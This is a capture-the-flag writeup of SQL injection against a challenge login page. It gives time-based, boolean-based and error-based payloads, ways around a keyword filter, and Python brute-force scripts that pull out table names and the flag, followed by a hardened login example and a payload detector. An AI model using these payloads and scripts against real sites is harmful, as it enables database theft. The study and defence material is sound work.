Adding ?tips=1 to the URL lowers the difficulty and turns this into an error-based blind injection. Every script in this writeup uses plain brute force rather than binary search; anyone interested can build on the scripts I provide and, if possible, drop a link in the comments (I don't really understand binary search, and I think the time spent writing it is better spent waiting for the brute force to finish). First, test the length of the database name:
name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd
The response took about 3 seconds even though we asked for sleep(1); for some reason the delay is roughly 3-4 times the value given (most likely because the condition, and with it sleep(), is evaluated once per row of the table being queried). Either way, the length is 4 (tried 1 to 4 one at a time).
Then test the database name. substr(a,b,c): a is the string to cut from, b is the position to start at, and c is the number of characters to take. For example, substr(database(),2,1) takes 1 character of the database name starting at position 2, i.e. the second character (if the name is note, the result is o).
name=1'+or+if(substr(database(),1,1)='n',sleep(1),1)#&pass=asdasd
The response only came back after three seconds, so the first character is n.
Here is a script:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
flag = ''
length = 4
for num in range(1, length + 1):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url=url, data=data)
        # a delayed response means the guessed character was right
        if int(time.time()) - t > 2:
            flag += i
            print("flag:", flag)
            break
print(flag)
Note that 'select' is filtered here; it can be bypassed by double-writing the keyword or by mixing upper and lower case.
name=1'+or+if(substr((seLEct+group_concat(table_name)+from+information_schema.tables+where+table_schema=database()),1,1)='f',sleep(1),1)#&pass=asdasd
Testing the first character gives f.

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
flag = ''
for num in range(1, 100):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url=url, data=data)
        # a delayed response means the guessed character was right
        if int(time.time()) - t > 2:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
name=1'+or+if(substr((seLEct+group_concat(column_name)+from+information_schema.columns+where+table_name='fl4g'),1,1)='f',sleep(1),1)#&pass=asdasd
The first character is f, so I'd guess the column is flag, but let's test it anyway:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"
flag = ''
for num in range(1, 100):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url=url, data=data)
        # a delayed response means the guessed character was right
        if int(time.time()) - t > 2:
            flag += i
            print("column_name:", flag)
            break
print("column_name:", flag)
The column name is flag.
Find the length of the flag:
name=1'+or+if(length((seLEct+flag+from+fl4g))=26,sleep(3),1)#&pass=asdasd
The length is 26.

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or if(substr(database(),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s',sleep(2),1)#"
#sql = "1' or if(substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s',sleep(2),1)#"
sql = "1' or if(substr((seLEct flag from fl4g),%d,1)='%s',sleep(2),1)#"
flag = ''
for num in range(1, 27):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        # print(data)
        t = int(time.time())
        r = requests.post(url=url, data=data)
        # a delayed response means the guessed character was right
        if int(time.time()) - t > 2:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
Turning to the boolean-based approach: first, study the error messages on the login page.
Logging in as admin reports a wrong password; logging in with any other account reports that the account does not exist. That gives us two distinguishable states: True or False.
Capture the requests in Burp and resend them:
admin: {"error":1,"msg":"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef"}
w4ke: {"error":1,"msg":"\u8d26\u53f7\u4e0d\u5b58\u5728"}
(The escapes decode to "account or password incorrect" and "account does not exist".) Both messages come from the page itself, so we can use them to decide whether our input evaluated to true. Construct the payload:
name=1' or 1=1#&pass=asdasd
The page returns the True message. Why True: the first check, username = '1', is False; the second, 1=1, is True; and False or True ⇒ True.
So as long as the condition we append evaluates to True, the whole statement is True, and we can start building the first attack script.
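Both oracles used in this writeup (the two different error messages, and the measurable delay from sleep()) exist because user input is spliced into the SQL text and the two failure cases are reported differently. As an added example that is not part of the original writeup, here is what a login handler looks like once both are closed: the name is bound as a parameter, and "no such account" and "wrong password" return one identical message after the same amount of work. The sqlite3 in-memory table, the function names (build_db, login, hash_password) and the sample credentials are my own assumptions, standing in for the challenge's MySQL backend.

```python
import hashlib
import hmac
import sqlite3

# One message for both "no such account" and "wrong password"; the boolean
# oracle in the writeup exists only because the two cases differ.
GENERIC_ERROR = {"error": 1, "msg": "account or password incorrect"}


def hash_password(password: str, salt: bytes) -> bytes:
    # PBKDF2-HMAC-SHA256; the iteration count is a constructed example value.
    return hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 100_000)


def build_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the challenge backend."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT PRIMARY KEY, salt BLOB, pw_hash BLOB)")
    salt = b"constructed-per-user-salt"
    conn.execute(
        "INSERT INTO users VALUES (?, ?, ?)",
        ("admin", salt, hash_password("correct horse battery", salt)),
    )
    conn.commit()
    return conn


def login(conn: sqlite3.Connection, name: str, password: str) -> dict:
    """Hardened login: user input is bound as data, never spliced into SQL text."""
    # With a placeholder, a value such as "1' or 1=1#" is looked up as a literal
    # username and simply matches no row; no or / sleep() / updatexml() is ever
    # evaluated by the database.
    row = conn.execute(
        "SELECT salt, pw_hash FROM users WHERE name = ?", (name,)
    ).fetchone()
    if row is None:
        # Burn the same hashing cost as the "user exists" path so the two
        # outcomes cannot be told apart by response time either.
        hash_password(password, b"constructed-dummy-salt")
        return dict(GENERIC_ERROR)
    salt, pw_hash = row
    if not hmac.compare_digest(hash_password(password, salt), pw_hash):
        return dict(GENERIC_ERROR)
    return {"error": 0, "msg": "ok"}


if __name__ == "__main__":
    db = build_db()
    for name, pw in [("admin", "correct horse battery"), ("admin", "wrong"),
                     ("w4ke", "asdasd"), ("1' or 1=1#", "asdasd")]:
        print(repr(name), "->", login(db, name, pw))
```

With this handler the payloads from the writeup are just unusual usernames: they return the same dictionary as a typo in the account name, so neither the page text nor the response time tells the caller whether the appended condition was true.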
name=1' or length(database())=4#&pass=asdasd
The database name is 4 characters long.
name=1' or substr(database(),1,1)='n'#&pass=asdasd
The first letter of the database name is n.
Build the script:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
sql = "1' or substr(database(),%d,1)='%s'#"
flag = ''
for num in range(1, 5):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        r = requests.post(url=url, data=data)
        time.sleep(0.2)
        # the "account or password incorrect" message means the condition was true
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
name=1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),1,1)='f'#&pass=asdasd
The first character of the table name is f. Script:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
flag = ''
for num in range(1, 8):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        r = requests.post(url=url, data=data)
        time.sleep(0.2)
        # the "account or password incorrect" message means the condition was true
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
name=1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),1,1)='f'#&pass=asdasd
The first character of the column name is also f. Script:

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"
flag = ''
for num in range(1, 13):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        r = requests.post(url=url, data=data)
        time.sleep(0.2)
        # the "account or password incorrect" message means the condition was true
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
name=1' or substr((seLEct flag from fl4g),1,1)='n'#&pass=asdasd
The first character is n. Script (the original had a stray "=" at the start of the sql string, which is fixed here):

import requests
import time

l = 'qwertyuiopasdfghjklzxcvbnm-=+_,.1234567890}{'
url = 'http://78e36ec4-b8e5-4239-ac2d-683f7742d342.node3.buuoj.cn/login.php'
#sql = "1' or substr(database(),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1)='%s'#"
#sql = "1' or substr((seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),%d,1)='%s'#"
sql = "1' or substr((seLEct flag from fl4g),%d,1)='%s'#"
flag = ""
for num in range(1, 28):
    for i in l:
        data = {
            'name': sql % (num, i),
            'pass': 'asdasd'
        }
        r = requests.post(url=url, data=data)
        time.sleep(0.05)
        # the "account or password incorrect" message means the condition was true
        if r"\u8d26\u53f7\u6216\u5bc6\u7801\u9519\u8bef" in r.text:
            flag += i
            print("flag:", flag)
            break
print("flag:", flag)
The challenge hints that if it is too hard you can append ?tips=1 to the URL, and I found that this makes the database error messages visible. extractvalue, updatexml and similar functions all work much the same way; I'll use updatexml here.
name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=asdasd
This directly reveals the database name.
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(table_name) from information_schema.tables where table_schema=database()),0x7e),1)#&pass=asdasd
name=1' and updatexml(1,concat(0x7e,(seLEct group_concat(column_name) from information_schema.columns where table_name='fl4g'),0x7e),1)#&pass=asdasd
name=1' and updatexml(1,concat(0x7e,(seLEct flag from fl4g),0x7e),1)#&pass=asdasd
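All three techniques in this writeup (the time-based payloads with sleep(), the boolean payloads built on quote-break plus substr()/length(), and the error-based updatexml() payloads) leave recognisable traces in the submitted form fields, including the case-mixing and double-written select that get past a naive keyword filter. As an added example that is not part of the original writeup, here is detection logic that normalises each form field and scores it against those indicators. The indicator names, the scoring rule and the sample request bodies are my own constructions; the injection bodies among the samples are the ones shown in the writeup, and the last sample uses the double-written keyword the writeup mentions.

```python
import re
from urllib.parse import parse_qs

# Indicator patterns keyed by the injection technique they point to; each is
# applied to the URL-decoded, lower-cased value of every form field.
INDICATORS = {
    "time-based": re.compile(r"\b(sleep|benchmark)\s*\("),
    "error-based": re.compile(r"\b(updatexml|extractvalue)\s*\("),
    "schema-enum": re.compile(r"information_schema\.(tables|columns)\b"),
    "subselect": re.compile(r"\bselect\b"),
    "boolean": re.compile(r"\b(substr|substring|mid|length|ascii)\s*\("),
    "quote-break": re.compile(r"'\s*(or|and)\b"),
    "comment-tail": re.compile(r"(#|--\s|/\*)\s*$"),
}
# Indicators that are suspicious on their own; the weaker ones need company,
# otherwise a password such as "p@ss#" would be flagged for its trailing '#'.
STRONG = {"time-based", "error-based", "schema-enum", "subselect"}


def normalize(value: str) -> str:
    """Lower-case and undo the double-written keyword trick (selselectect -> select)."""
    text = value.lower()
    prev = None
    while prev != text:  # keep collapsing until nothing nested is left
        prev = text
        text = re.sub(r"sel(select)ect", r"\1", text)
    return text


def classify_body(body: str) -> set:
    """Return the indicator names present in any field of a form-encoded body."""
    hits = set()
    # parse_qs splits on '&' and the first '=', and URL-decodes '+' and %xx.
    for values in parse_qs(body, keep_blank_values=True).values():
        for v in values:
            text = normalize(v)
            hits.update(name for name, pat in INDICATORS.items() if pat.search(text))
    return hits


def is_suspicious(hits: set) -> bool:
    """Flag a request on any strong indicator, or on two or more weak ones."""
    return bool(hits & STRONG) or len(hits) >= 2


# Constructed sample records: (request id, POST body to login.php).
SAMPLE_BODIES = [
    ("r1", "name=admin&pass=hunter2"),
    ("r2", "name=admin&pass=p@ss#"),
    ("r3", "name=1'+or+if(length(database())=4,sleep(1),1)#&pass=asdasd"),
    ("r4", "name=1' or 1=1#&pass=asdasd"),
    ("r5", "name=1' and updatexml(1,concat(0x7e,(select database()),0x7e),1)#&pass=asdasd"),
    ("r6", "name=1' or substr((seLSELECTect flag from fl4g),1,1)='n'#&pass=asdasd"),
]


def scan(records) -> dict:
    """Map request id -> sorted indicator list for every record judged suspicious."""
    flagged = {}
    for rid, body in records:
        hits = classify_body(body)
        if is_suspicious(hits):
            flagged[rid] = sorted(hits)
    return flagged


if __name__ == "__main__":
    for rid, hits in scan(SAMPLE_BODIES).items():
        print(rid, hits)
```

The normalisation step is the part worth copying: a filter that only removes the literal lowercase "select" once is exactly what the case-mixed and double-written payloads are built to get past, so the detector lower-cases and collapses nested keywords until nothing changes before matching. The two-tier scoring keeps the weak indicators (a trailing "#", a quote followed by or/and) from flagging ordinary passwords on their own while still catching a bare tautology like 1' or 1=1# that carries both.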
Reposted from: http://zopbi.baihongyu.com/